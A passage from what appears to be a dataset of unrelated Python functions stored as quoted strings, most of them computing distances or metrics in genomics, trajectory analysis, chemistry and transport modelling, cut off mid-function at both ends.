input_args['junction_len_filter']:\n return\n\n else:\n out_vals['junction_aa'] = ''\n out_vals['productive'] = 'F'\n\n # If the option to ignore non-productive rearrangements has been set, skip this row\n if input_args['productivity_filter']:\n return\n\n # If users wanted to they could infer the junction nt sequence, but I haven't, as it's redundant/not very useful\n out_vals['junction'] = ''\n\n # Extract the VDJ genes, fixing their nomenclature and combining together multiple possible calls\n for gene in ['v', 'd', 'j']:\n\n # First take Adaptive's best call\n call = split_line[params[gene + 'MaxResolved']]\n\n # Check whether the code wants to be looking for D genes\n if input_args['no_d'] and gene == 'd':\n sorted_call = ''\n\n # Check whether a gene has been called - if not (and not D) check in the ambiguous gene name ties field\n # NB ambiguous Ds are ignored by default, as there are only two options for TRBD and they're almost identical\n elif not call or call == 'unresolved':\n if gene == 'd' and input_args['no_d_ambiguity']:\n sorted_call = ''\n else:\n sorted_call = resolve_ambiguous_name(split_line, gene)\n\n # If it has full allele accuracy (indicated by an asterisk), tidy it up and take that as the result\n elif call[-3] == '*':\n sorted_call = check_gene(tidy_gene(call))\n\n # Depending on the (hidden) version of the input data, remaining ambiguity might be resolved in 2 places:\n # either in the GeneNameTies or AlleleNameTies fields - need to infer which is correct and deal appropriately\n else:\n\n if bits[params[gene + 'GeneNameTies']]:\n sorted_call = resolve_ambiguous_name(split_line, gene)\n elif bits[params[gene + 'GeneAlleleTies']]:\n sorted_call = resolve_ambiguous_allele(call, split_line, gene)\n\n # However some files are not even covered by that broad formatting, so you just need to allow whatever\n elif input_args['allow_ambiguity']:\n sorted_call = check_gene(tidy_gene(call))\n\n else:\n raise IOError(\"Unknown format on line \" + str(line_count) + \"! Cannot continue. 
\"\n \"\\n\\tAmbiguity for \" + gene.upper() + \" gene calls lacking allele info that is\"\n \"\\n\\t not resolved in either 'Gene' or 'Allele Ties' fields.\"\n \"\\n\\tTry re-running the script using the '-a' flag (to allow ambiguity),\"\n \"\\n\\t and check that the format of the output document is correct.\")\n\n # If option is selected, remove allele level information\n if input_args['strip_alleles']:\n sorted_call = strip_alleles(poss_alleles, sorted_call)\n\n out_vals[gene + '_call'] = sorted_call\n\n # Finally pad the missing values for the required columns\n for value in [x for x in out_headers if x not in out_vals]:\n out_vals[value] = ''\n\n return out_vals", "def nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n\n return _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix, dist_weight, gap_penalty, ntrim, ctrim, fixed_gappos)", "def s_dtw(t0, t1):\n n0 = len(t0)\n n1 = len(t1)\n C = np.zeros((n0 + 1, n1 + 1))\n C[1:, 0] = float('inf')\n C[0, 1:] = float('inf')\n for i in np.arange(n0) + 1:\n for j in np.arange(n1) + 1:\n C[i, j] = great_circle_distance(t0[i - 1][0], t0[i - 1][1], t1[j - 1][0], t1[j - 1][1]) + \\\n min(C[i, j - 1], C[i - 1, j - 1], C[i - 1, j])\n dtw = C[n0, n1]\n return dtw", "def tnc(self):\n\n if os.path.isfile(self.scenario_path + \"/output/TNCTrips.csv\"):\n\n # load the output folder tnc trip list\n trips = pd.read_csv(self.scenario_path + \"/output/TNCTrips.csv\",\n usecols=[\"trip_ID\", # unique trip surrogate key\n \"originTaz\", # trip origin TAZ\n \"destinationTaz\", # trip destination TAZ\n \"totalPassengers\"]) # passengers in vehicle excluding driver (0-6)\n\n # append distance and time skims\n # using am peak period hov-2 low value of time\n am_skims = om.open_file(self.scenario_path + \"/output/traffic_skims_AM.omx\")\n\n trips[\"distanceTotal\"] = [\n am_skims[\"AM_HOV2_L_DIST\"][o - 1, d - 1]\n for o, d in zip(trips[\"originTaz\"], trips[\"destinationTaz\"])\n ]\n\n trips[\"timeTotal\"] = [\n am_skims[\"AM_HOV2_L_TIME\"][o - 1, d - 1]\n for o, d in zip(trips[\"originTaz\"], trips[\"destinationTaz\"])\n ]\n\n am_skims.close()\n\n # create person and trip-based weights based on occupancy\n trips[\"passengers\"] = trips[\"totalPassengers\"]\n trips[\"weightPersonTrip\"] = (trips[\"totalPassengers\"] + 1) * 1 / self.sample_rate\n trips[\"weightTrip\"] = 1 * 1 / self.sample_rate\n\n return trips[[\"trip_ID\",\n \"passengers\",\n \"distanceTotal\",\n \"timeTotal\",\n \"weightPersonTrip\",\n \"weightTrip\"]]\n\n else:\n return False", "def dtw(x, y, dist='euclidean'):\n # sanity check\n r, c = len(x), len(y)\n assert r and c, \"the input cannot be empty array\"\n\n if np.ndim(x) == 1:\n x = np.array(x)[:, np.newaxis]\n if np.ndim(y) == 1:\n y = np.array(y)[:, np.newaxis]\n\n # initialization\n step = [(-1, -1), (-1, 0), (0, -1)]\n C = np.zeros((r + 1, c + 1))\n C[:, 0] = C[0, :] = np.inf\n\n # assign cost\n if isinstance(dist, str):\n C[1:, 1:] = cdist(x, y, dist)\n else:\n for i in range(1, r+1):\n for j in range(1, c+1):\n C[i, j] = dist(x[i-1], y[j-1])\n cost = C[1:, 1:].copy()\n\n # DP body\n for i in range(1, r+1):\n for j in range(1, c+1):\n if j == i == 1:\n continue\n C[i, j] += min([C[i+s[0], j+s[1]] for s in step])\n\n dtw_dist = C[-1, -1]/(r+c)\n acc_cost = C[1:, 1:]\n\n # trace back\n path = _traceback(C[1:, 1:], step)\n return dtw_dist, cost, acc_cost, path", "def distanceTo(\n self,\n trgtstn=None,\n instofst=None,\n 
trgtofst=None,\n refcoef=None,\n ddxyz=False,\n offsettype=None,\n ):\n diff = self.vectorTo(trgtstn, instofst, trgtofst, offsettype=offsettype)\n dist = np.sqrt(np.vdot(diff, diff))\n if not ddxyz:\n return dist\n diff /= dist\n return dist, -diff, diff", "def ccw(p1, p2, p3):\n return (p2[0] - p1[0])*(p3[1] - p1[1]) - (p2[1] - p1[1])*(p3[0] - p1[0])", "def distance(self, t1, t2, costs=unit_costs):\r\n #print costs\r\n #raw_input(\"pause\")\r\n # Cf. Zhang & Shasha:p.1252-1253\r\n #===========================================================================\r\n # Use an embedded function, so T1,T2, l1,l2, and TD are available from the\r\n # name space of the outer function and don't need to be dragged around in\r\n # each function call\r\n # TREEDIST function\r\n #===========================================================================\r\n def edit_dist(i, j):\r\n \"\"\"\r\n compute edit distance between two subtrees rooted in nodes i and j\r\n respectively\r\n \"\"\"\r\n # temporary array for forest distances\r\n FD = ForestDist()\r\n for n in range(l1[i], i+1):\r\n FD[ (l1[i],n), None ] = ( FD[ (l1[i],n-1), None ] + \r\n costs(T1[n], None) ) #NOT SURE ABOUT THE T1[n].label --> TO BE CHECKED\r\n \r\n for m in range(l2[j], j+1):\r\n FD[ None, (l2[j],m) ] = ( FD[ None, (l2[j],m-1) ] + \r\n costs(None, T2[m]) )\r\n \r\n for n in range(l1[i], i+1):\r\n for m in range(l2[j], j+1):\r\n if l1[n] == l1[i] and l2[m] == l2[j]:\r\n FD[ (l1[i],n), (l2[j],m) ] = min(\r\n FD[(l1[i],n-1),(l2[j],m)] + costs(T1[n], None),\r\n FD[(l1[i],n),(l2[j],m-1)] + costs(None, T2[m]),\r\n FD[(l1[i],n-1),(l2[j],m-1)] + costs(T1[n], T2[m]))\r\n \r\n TD[n, m] = FD[ (l1[i],n), (l2[j],m) ]\r\n else:\r\n FD[ (l1[i],n), (l2[j],m) ] = min(\r\n FD[(l1[i],n-1),(l2[j],m)] + costs(T1[n], None),\r\n FD[(l1[i],n),(l2[j],m-1)] + costs(None, T2[m]),\r\n FD[(l1[i],n-1),(l2[j],m-1)] + TD[n,m])\r\n return TD[i,j]\r\n \r\n \r\n #Compute T1[] and T2[]\r\n T1 = self.postorder(t1)\r\n T2 = self.postorder(t2)\r\n \r\n # Compute l()\r\n l1 = self.leftmost_leaf_descendant_indices(T1)\r\n l2 = self.leftmost_leaf_descendant_indices(T2)\r\n \r\n # LR_keyroots1 and LR_keyroots2\r\n kr1 = self.key_root_indices(l1)\r\n kr2 = self.key_root_indices(l2)\r\n \r\n # permanent treedist array\r\n TD = dict()\r\n for i in kr1:\r\n for j in kr2:\r\n edit_dist(i, j)\r\n \r\n #self.print_matrix(T1, T2, TD)\r\n \r\n return TD[i,j]", "def calculate(self, rxn: ComputedReaction) -> float:\n combos = chain(\n product(rxn.reactant_entries, rxn.product_entries),\n combinations(rxn.product_entries, 2),\n )\n distances = [\n self.cpd.shortest_domain_distance(\n combo[0].composition.reduced_formula,\n combo[1].composition.reduced_formula,\n )\n for combo in combos\n ]\n\n distance = self._mu_func(distances)\n return distance", "def get_distances(self, crds):\n self.all_dist = np.zeros((self.natom, self.natom))\n # Loop over upper triangle of atom pairs\n for iat in range(self.natom-1):\n # Get the atom indices\n at_inds = np.arange(len(crds))\n\n # Calc distances between atoms (only upper triangle though)\n at_msk = at_inds > iat\n all_ut_dist = crds[at_msk] - crds[iat]\n all_ut_dist = np.linalg.norm(all_ut_dist, axis=1)\n\n self.all_dist[iat, iat+1:] = all_ut_dist\n\n # Get lower triangle indices\n self.all_dist = self.all_dist + self.all_dist.T", "def edit_distance(self):\n\n edit_dist = 0\n misaligned = False\n\n try:\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = 
[g.strip() for g in gt_file.readlines()]\n\n num_symbols = 0\n bd = 0\n # Go through all lines (for polyphony)\n for i in range(len(out_lines)):\n # Skip comparing sequence staff line\n if 'Sequence staff' in gt_lines[i]:\n continue\n\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n #print('Out:',out_split)\n #print('Gt:',gt_split)\n\n num_symbols += len(gt_split) # for calculating symbol error rate\n misaligned = 'misaligned' in out_lines[i] # for ensembling\n\n _a = [symbol for symbol in out_split if symbol != '\\n' and symbol != -1]\n _b = [symbol for symbol in gt_split if symbol != '\\n' and symbol != -1]\n\n ed = self.levenshtein(_a,_b)\n \n # Account for barline at end (don't use when checking CRNN output)\n #if ed == 1 and out_split[-1] == 'barline' and gt_split[-1] != 'barline':\n # ed = 0\n \n edit_dist += ed\n \n staff_num = (i + 1) // 2\n \n if ed == 1:\n pass\n #print(self.output_file)\n #print('Edit dist (staff #%d): %d' % (staff_num, ed))\n \n if _a[-1] == 'barline' and _b[-1] != 'barline' or \\\n _a[-1] != 'barline' and _b[-1] == 'barline':\n #print('Barline diff') \n # print(self.output_file)\n bd = 1\n #print(_a)\n #print(_b)\n \n\n '''\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n '''\n except FileNotFoundError:\n print('Missing:',self.output_file, self.gt_file)\n return -1, 1, 0, False\n #print('Found:',self.output_file, self.gt_file)\n return edit_dist, num_symbols, bd, misaligned", "def get_dist(text1, text2, wv):\n t1 = lookup(text1, wv)\n t2 = lookup(text2, wv)\n dist = cos_sim(t1, t2)\n return dist", "def pairwise_correlation_difference(self):\r\n\r\n real_cat, synth_cat = self.to_cat(self.origdst, self.synthdst)\r\n\r\n real_cat_dem = self.get_demographics(real_cat)\r\n synth_cat_dem = self.get_demographics(synth_cat)\r\n\r\n corr_real_obj = associations(real_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n corr_synth_obj = associations(synth_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n\r\n corr_real = corr_real_obj['corr']\r\n corr_rand = corr_synth_obj['corr']\r\n\r\n substract_m = np.subtract(corr_real, corr_rand)\r\n prwcrdst = LA.norm(substract_m)\r\n\r\n return prwcrdst, substract_m", "def dist_cost(s_vr, failed_vr, neighbor_vr, dist_matrix, w_a1, w_a2):\n #print s_vr, failed_vr, neighbor_vr\n dist_i_f = dist_matrix[s_vr][failed_vr + 1]\n dist_i_k = dist_matrix[s_vr][neighbor_vr + 1]\n dist = w_a1 * float(dist_i_f) + w_a2 * float(dist_i_k)\n #print \"d_i_f: \", dist_i_f, \", dist_i_k: \", dist_i_k\n return dist", "def distance_between(self, n1, n2):\n if self.distance_method == 'direct':\n n1_relevants = 0\n n2_relevants = 0\n for i in range(len(self.sample)):\n if is_relevant(self.sample.iloc[i], n1.anchor):\n n1_relevants += 1\n if is_relevant(self.sample.iloc[i], n2.anchor):\n n2_relevants += 1\n return (n1_relevants - n2_relevants)/len(self.sample)\n else:\n return 0.5", "def prep_distance(self, t: str = 'float') -> np.ndarray:\n d = np.zeros([self.ic.shape[0]*self.ic.shape[1],\n self.ic.shape[1]*self.ic.shape[0]])\n\n u,v = np.meshgrid(np.arange(self.ic.shape[0]),\n np.arange(self.ic.shape[1]),\n sparse=False, indexing='xy')\n u = u.ravel()\n v = v.ravel()\n z = np.array([u,v]).T\n\n for (k,x) in enumerate(z):\n if not self.boundary:\n d[k,:] = 
np.array(np.sqrt((u - x[0])**2 + (v - x[1])**2),dtype=t)\n\n else:\n d[k,:] = self.torus(x[0],x[1],\n self.ic.shape[0],\n self.ic.shape[1]\n ).ravel()\n\n return d", "def c_align_split_n(self, tik_instance):\n n_d, d_d, h_d, w_d, _ = self.dst_shape\n dhw_d = d_d * h_d * w_d\n nc_one = self.ub_ele // dhw_d\n c_align = self.c_1 * self.c_0\n n_ub = nc_one // c_align\n\n all_core = _ceil_div(n_d, n_ub)\n ac_num = _set_core_num(all_core)\n\n with tik_instance.for_range(0, ac_num, block_num=ac_num) as num_core:\n ub_ori = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_ori\",\n scope=tik.scope_ubuf)\n ub_trans = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_trans\",\n scope=tik.scope_ubuf)\n\n ub_loop = _set_loop(tik_instance, num_core, ac_num, all_core)\n\n with tik_instance.for_range(0, ub_loop) as num_u:\n core_index = num_u * ac_num + num_core\n\n with tik_instance.if_scope(core_index < all_core - 1):\n n_len = n_ub\n n_before = n_ub * core_index\n args = tik_instance, ub_ori, ub_trans, n_before, n_len\n self.func_c_align_split_n(args)\n\n with tik_instance.else_scope():\n n_before = (all_core - 1) * n_ub\n n_len = n_d - n_before\n args = tik_instance, ub_ori, ub_trans, n_before, n_len\n self.func_c_align_split_n(args)\n\n return tik_instance", "def calc_dist_diff(self, obj1_position, obj2_position, obj3_position):\n if self.prev_obj1_position is None and self.prev_obj2_position is None and self.prev_obj3_position is None:\n self.prev_obj1_position = obj1_position\n self.prev_obj2_position = obj2_position\n self.prev_obj3_position = obj3_position\n\n prev_diff_12 = self.task.calc_distance(self.prev_obj1_position, self.prev_obj2_position)\n current_diff_12 = self.task.calc_distance(obj1_position, obj2_position)\n\n prev_diff_13 = self.task.calc_distance(self.prev_obj1_position, self.prev_obj3_position)\n current_diff_13 = self.task.calc_distance(obj1_position, obj3_position)\n\n prev_diff_23 = self.task.calc_distance(self.prev_obj2_position, self.prev_obj3_position)\n current_diff_23 = self.task.calc_distance(obj2_position, obj3_position)\n \n norm_diff = (prev_diff_13 - current_diff_13) / prev_diff_13 + (prev_diff_23 - current_diff_23) / prev_diff_23 + (prev_diff_12 - current_diff_12) / prev_diff_12\n\n self.prev_obj1_position = obj1_position\n self.prev_obj2_position = obj2_position\n self.prev_obj3_position = obj3_position\n\n return norm_diff", "def euclidean_dist(self):\r\n\r\n real_cat, synth_cat = self.to_cat(self.origdst, self.synthdst)\r\n\r\n real_cat_dem = self.get_demographics(real_cat)\r\n synth_cat_dem = self.get_demographics(synth_cat)\r\n\r\n corr_real_obj = associations(real_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n corr_synth_obj = associations(synth_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n\r\n corr_real = corr_real_obj['corr']\r\n corr_rand = corr_synth_obj['corr']\r\n\r\n eucl_matr = distance.cdist(corr_real, corr_rand, 'euclidean')\r\n\r\n eucl = LA.norm(eucl_matr)\r\n\r\n return eucl, eucl_matr", "def distance(self, c1, c2):\n if c1 > c2:\n c1, c2 = c2, c1\n clusterDistance = self.clusterDistanceCache.get((c1,c2), None)\n if clusterDistance is None:\n totalDistance = FeatureComparisonResult() # 0.0\n count = 0\n for b1 in self.c2b[c1]:\n for b2 in self.c2b[c2]:\n totalDistance = totalDistance.add(self._baseDistance(b1, b2))\n count += 1\n if count == 0:\n clusterDistance = FeatureComparisonResult() # 0.0\n else:\n clusterDistance = totalDistance.normalize(count)\n self.clusterDistanceCache[(c1,c2)] = 
clusterDistance\n return clusterDistance", "def _Conv3DGrad(op, grad):\n strides = op.get_attr('strides')\n padding = op.get_attr('padding')\n data_format = op.get_attr('data_format')\n shape_0, shape_1 = array_ops.shape_n([op.inputs[0], op.inputs[1]])\n dx = nn_ops.conv3d_backprop_input_v2(\n shape_0,\n op.inputs[1],\n grad,\n strides=strides,\n padding=padding,\n data_format=data_format)\n dw = nn_ops.conv3d_backprop_filter_v2(\n op.inputs[0],\n shape_1,\n grad,\n strides=strides,\n padding=padding,\n data_format=data_format)\n dw = 0.5 * (dw + tf.transpose(dw, (0, 1, 2, 4, 3)))\n return dx, dw\n # # Pool grads across symmetric channels\n # dw_t = tf.transpose(\n # dw,\n # (3, 4, 0, 1, 2))\n # dw_symm_t = (0.5) * (dw_t + tf.transpose(\n # dw,\n # (4, 3, 0, 1, 2)))\n # dw_symm = tf.transpose(\n # dw_symm_t,\n # (2, 3, 4, 0, 1))\n # return dx, dw_symm", "def F_calcDMradius(i, t, st, dm, t1, tth):\n mr = st.mn*dm.mxkg_v[i]/(st.mn+dm.mxkg_v[i]) # reduced mass, kg\n # before thermalization (cooling), rx changes with time:\n rxco = np.array([ F_rxco2(tim,t1,mr,(st.nb*1.e+6),dm.sigx_m,st.Rs,dm.mxkg_v[i],pF) for tim in t.time ]) # cm\n print \"-- Radius: rxco at t1 = \",F_rxco2(t1+0.1,t1,mr,(st.nb*1.e+6),dm.sigx_m,st.Rs,dm.mxkg_v[i],pF)\n # after thermalization:\n rxth1 = F_rxth(dm.mx_v[i],st.rhoc,st.Temp) # cm (formula)\n rxth2 = np.interp(tth,t.time,rxco) \t# cm (rxco(tth))\n rxth = rxth1\n print \" rxth=%.2e , rxth1=%.2e , rxth2=%.2e\" % (rxth,rxth1,rxth2)\n for k in xrange(len(t.time)):\n if t.time[k]<t1:\n t.rxtag[k] = 'Rs '\n t.rx[k] = st.Rs*1.e+2\n elif t.time[k]<tth:\n t.rxtag[k] = 'rxco'\n t.rx[k] = rxco[k]\n elif t.time[k]>=tth:\n t.rxtag[k] = 'rxth'\n t.rx[k] = rxth\n return rxco, rxth", "def calc_distances_from_central(cluster, embedding):\n\n return calc_distances_in_embedding(cluster, embedding)", "def canonical_triple(self, c1=0, c2=0):\n if self.q < 3:\n raise ValueError()\n A3 = self.L.generator()\n a3 = self.K.quotient(self.fe.difference_norm(A3, self.L.one()), c1)\n t = self.K.quotient(self.K.product(c2, a3), self.fe.norm(A3))\n return self.canonical_pair(t) + ((A3, a3),)", "def _calc_distance(r1, r2):\n return np.linalg.norm(r1 - r2)", "def add_corridor_constraint(self,seg,r,weight=1.0):\n\n constraint_type = \"cylinder\"\n params = dict()\n params['x1'] = np.array([ self.qr_polytraj.waypoints['x'][0,seg],\n self.qr_polytraj.waypoints['y'][0,seg],\n self.qr_polytraj.waypoints['z'][0,seg]])\n params['x2'] = np.array([ self.qr_polytraj.waypoints['x'][0,seg+1],\n self.qr_polytraj.waypoints['y'][0,seg+1],\n self.qr_polytraj.waypoints['z'][0,seg+1]])\n params['der'] = 0\n params['l'] = r # Give the same radius buffer on the end caps\n params['r'] = r\n params['weight'] = weight\n params['keep_out'] = False\n params['active_seg'] = seg\n\n\n self.qr_polytraj.add_constraint(constraint_type,params,dynamic_weighting=False,sum_func=False)", "def get_cdr3(dcr, headers):\n\n # NB: A productively rearranged receptor does not necessarily mean that it is the working receptor used in a cell!\n out_data = coll.defaultdict()\n for field in headers:\n out_data[field] = ''\n\n out_data['decombinator_id'] = dcr\n out_data['rev_comp'] = 'F'\n\n # CDR3-defining positions\n start_cdr3 = 0\n end_cdr3 = 0\n\n # 1. 
Rebuild whole nucleotide sequence from Decombinator assignment\n classifier_elements = dcr.split(', ')\n v = int(classifier_elements[0])\n j = int(classifier_elements[1])\n vdel = int(classifier_elements[2])\n jdel = int(classifier_elements[3])\n ins_nt = classifier_elements[4]\n\n # TODO remove 'split' if and when the gene names in the tag files get properly adjusted to be consistent\n out_data['v_call'] = v_names[v].split('*')[0]\n out_data['j_call'] = j_names[j].split('*')[0]\n\n if vdel == 0:\n v_used = v_regions[v]\n else:\n v_used = v_regions[v][:-vdel]\n\n j_used = j_regions[j][jdel:]\n\n out_data['sequence'] = ''.join([v_used, ins_nt, j_used])\n\n # 2. Translate\n out_data['sequence_aa'] = str(Seq(out_data['sequence']).translate())\n\n # 3. Check whether whole rearrangement is in frame\n if (len(out_data['sequence']) - 1) % 3 == 0:\n out_data['productive'] = 'T'\n out_data['vj_in_frame'] = 'T'\n else:\n out_data['productive'] = 'F'\n out_data['vj_in_frame'] = 'F'\n\n # 4. Check for stop codons in the in-frame rearrangements\n if '*' in out_data['sequence_aa']:\n out_data['productive'] = 'F'\n out_data['stop_codon'] = 'T'\n else:\n out_data['stop_codon'] = 'F'\n\n # 5. Check for conserved cysteine in the V gene\n if out_data['sequence_aa'][v_translate_position[v] - 1] == v_translate_residue[v]:\n start_cdr3 = v_translate_position[v] - 1\n out_data['conserved_c'] = 'T'\n else:\n out_data['productive'] = 'F'\n out_data['conserved_c'] = 'F'\n\n # 5.5 Having found conserved cysteine, only need look downstream to find other end of CDR3\n downstream_c = out_data['sequence_aa'][start_cdr3:]\n\n # 6. Check for presence of FGXG motif (or equivalent)\n site = downstream_c[j_translate_position[j]:j_translate_position[j] + 4]\n\n if re.findall(j_translate_residue[j], site):\n end_cdr3 = len(downstream_c) + j_translate_position[j] + start_cdr3 + 1\n out_data['conserved_f'] = 'T'\n else:\n out_data['productive'] = 'F'\n out_data['conserved_f'] = 'F'\n\n if out_data['productive'] == 'T':\n out_data['junction_aa'] = out_data['sequence_aa'][start_cdr3:end_cdr3]\n out_data['junction'] = out_data['sequence'][start_cdr3 * 3:3 * end_cdr3]\n out_data['cdr1_aa'] = v_cdr1[v]\n out_data['cdr2_aa'] = v_cdr2[v]\n\n return out_data", "def distance_matrix_squared(crd1, crd2, dim=2):\n crd1 = ensure_traj(crd1)\n crd2 = ensure_traj(crd2)\n n = int(np.shape(crd1)[1] / dim)\n\n crd1_components = [\n np.tile(np.expand_dims(crd1[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n crd2_components = [\n np.tile(np.expand_dims(crd2[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n D2_components = [\n (crd1_components[i] - np.transpose(crd2_components[i], axes=(0, 2, 1))) ** 2\n for i in range(dim)\n ]\n D2 = np.sum(D2_components, axis=0)\n return D2", "def cer(self, s1, s2):\n s1, s2, = s1.replace(' ', ''), s2.replace(' ', '')\n return Lev.distance(s1, s2)", "def coll_trim(th):\n lam = TipLoss(lamInit, th)\n AoA = th - lam / r\n dCL, dCD = PolarLookup(AoA)\n dCT = 0.5 * solDist * (dCL*np.cos(lam/r)-dCD*np.sin(lam/r))* r ** 2\n # dCT = 0.5 * solDist * dCL * r ** 2\n CT = np.trapz(dCT, r)\n\n return CT, dCT, dCL, dCD, lam, AoA", "def _compute_snp_distances(self, task):\n genetic_map = task[\"genetic_map\"]\n temp = task[\"snps\"]\n\n # merge genetic map for this chrom\n temp = pd.concat([temp, genetic_map], ignore_index=False, sort=True)\n\n # sort based on pos\n temp = temp.sort_values(\"pos\")\n\n # fill recombination rates forward\n temp[\"rate\"] = temp[\"rate\"].fillna(method=\"ffill\")\n\n # assume recombination 
rate of 0 for SNPs upstream of first defined rate\n temp[\"rate\"] = temp[\"rate\"].fillna(0)\n\n # get difference between positions\n pos_diffs = np.ediff1d(temp[\"pos\"])\n\n # compute cMs between each pos based on probabilistic recombination rate\n # https://www.biostars.org/p/123539/\n cMs_match_segment = (temp[\"rate\"] * np.r_[pos_diffs, 0] / 1e6).values\n\n # add back into temp\n temp[\"cMs\"] = np.r_[0, cMs_match_segment][:-1]\n\n temp = temp.reset_index()\n\n # use null `map` values to find locations of SNPs\n snp_indices = temp.loc[temp[\"map\"].isnull()].index\n\n # use SNP indices to determine boundaries over which to sum cMs\n start_snp_ix = snp_indices + 1\n end_snp_ix = np.r_[snp_indices, snp_indices[-1]][1:] + 1\n snp_boundaries = np.c_[start_snp_ix, end_snp_ix]\n\n # sum cMs between SNPs to get total cM distance between SNPs\n # http://stackoverflow.com/a/7471967\n c = np.r_[0, temp[\"cMs\"].cumsum()][snp_boundaries]\n cM_from_prev_snp = c[:, 1] - c[:, 0]\n\n temp = temp.loc[temp[\"map\"].isna()]\n\n # add back into temp\n temp[\"cM_from_prev_snp\"] = np.r_[0, cM_from_prev_snp][:-1]\n\n # restore index\n temp = temp.set_index(\"index\")\n\n return pd.DataFrame(temp[\"cM_from_prev_snp\"])", "def calculateDistance(toPredict, toCompare):\n totalDist = 0\n\n #Calculate the matching score for each attribute\n runtimeDist = matchRuntime(toPredict['runtime'], toCompare['runtime'])\n budgetDist = matchBudget(toPredict['budget'], toCompare['budget_adj'])\n directorDist = matchDirector(toPredict['director'], toCompare['director'])\n genreDist = matchGenres(toPredict['genres'], toCompare['genres'])\n actorDist = matchActors(toPredict['cast'], toCompare['cast'])\n companyDist = matchCompanies(toPredict['production_companies'], toCompare['production_companies'])\n\n #Sum up the individual attribute matching scores time their weights\n totalDist += runtimeDist * RUNTIME_WEIGHT\n totalDist += budgetDist * BUDGET_WEIGHT\n totalDist += directorDist * DIRECTOR_WEIGHT\n totalDist += genreDist * GENRE_WEIGHT\n totalDist += actorDist * ACTOR_WEIGHT\n totalDist += companyDist * COMPANIES_WEIGHT\n\n return totalDist", "def compute_distance(self):\n loc = np.extend_dims(self.state[:, :, Boids.Attr.LOC], axis=-1)\n m = np.tile(loc, (1, 1, self.num_boids))\n pos_diff = m-m.transpose(0, 2, 1)\n self.distance = np.linalg.norm(pos_diff, axis=0)", "def e_dtw(t0, t1):\n\n n0 = len(t0)\n n1 = len(t1)\n C = np.zeros((n0 + 1, n1 + 1))\n C[1:, 0] = float('inf')\n C[0, 1:] = float('inf')\n for i in np.arange(n0) + 1:\n for j in np.arange(n1) + 1:\n C[i, j] = eucl_dist(t0[i - 1], t1[j - 1]) + min(C[i, j - 1], C[i - 1, j - 1], C[i - 1, j])\n dtw = C[n0, n1]\n return dtw", "def distance(cls,config_1, config_2):\n\t\tsorted_data_1 = (config_1.data).sort_values('item')\n\t\tsorted_data_2 = (config_2.data).sort_values('item')\n\t\tdr = sorted_data_1 - sorted_data_2\n\t\treturn np.linalg.norm(dr)", "def dist(pattern, dnas):\n if type(dnas) == str:\n dnas = [dnas]\n\n assert (is_dna(pattern))\n assert (all(is_dna(dna) for dna in dnas))\n\n def dist_to_single_dna(pat, dna_string):\n return min(hamming(pat, kmer) for kmer in get_all_kmers(dna_string, len(pat)))\n\n return sum(dist_to_single_dna(pattern, dna) for dna in dnas)", "def dist_canberra(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if any(datamtx<0.0):\n raise ValueError(\"negative value in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n 
numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n oldstate = seterr(invalid='ignore',divide='ignore')\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i]\n for j in range(i):\n r2 = datamtx[j]\n dist = 0.0\n net = abs( r1 - r2 ) / (r1 + r2)\n\n net = nan_to_num(net)\n num_nonzeros = nonzero(net)[0].size\n dists[i,j] = dists[j,i] = nan_to_num(net.sum()/num_nonzeros)\n \n seterr(**oldstate)\n return dists", "def distance_pbc(cls, config_1, config_2):\n\t\tsorted_data_1 = (config_1.data).sort_values('item')\n\t\tsorted_data_2 = (config_2.data).sort_values('item')\n\t\tbox_dim_1 = config_1.box_dim\n\t\tbox_dim_2 = config_2.box_dim\n\t\ti = 0\n\t\ttotal_distance = 0.0\n\t\tfor index, row in sorted_data_1.iterrows():\n\t\t\tatom_1 = Atom.from_ds(row)\n\t\t\tatom_1.box_dim = box_dim_1\n\t\t\tatom_2 = Atom.from_ds(sorted_data_2.iloc[i])\n\t\t\tatom_2.box_dim = box_dim_2\n\t\t\tatom_dist = Atom.distance_pbc(atom_1,atom_2)\n\t\t\ttotal_distance = total_distance + atom_dist ** 2\n\t\t\ti = i + 1\n\t\treturn total_distance ** 0.5", "def adjust_clinker_ratio(self, d_act):\n\n for d in d_act:\n\n ratio_to_reach = self.clinker_ratio_remind.sel(dict(\n region=self.geo.iam_to_iam_region(d) if self.model == \"image\" else d\n )).values\n\n share = []\n ratio = []\n\n for exc in d_act[d]['exchanges']:\n if 'cement' in exc['product'] and exc['type'] == \"technosphere\":\n share.append(exc['amount'])\n ratio.append(self.clinker_ratio_eco[(exc['name'], exc['location'])])\n\n share = np.array(share)\n ratio = np.array(ratio)\n\n average_ratio = (share * ratio).sum()\n\n iteration = 0\n while average_ratio > ratio_to_reach and iteration < 100:\n share[share == 0] = np.nan\n\n ratio = np.where(share >= 0.001, ratio, np.nan)\n\n highest_ratio = np.nanargmax(ratio)\n lowest_ratio = np.nanargmin(ratio)\n\n share[highest_ratio] -= .01\n share[lowest_ratio] += .01\n\n average_ratio = (np.nan_to_num(ratio) * 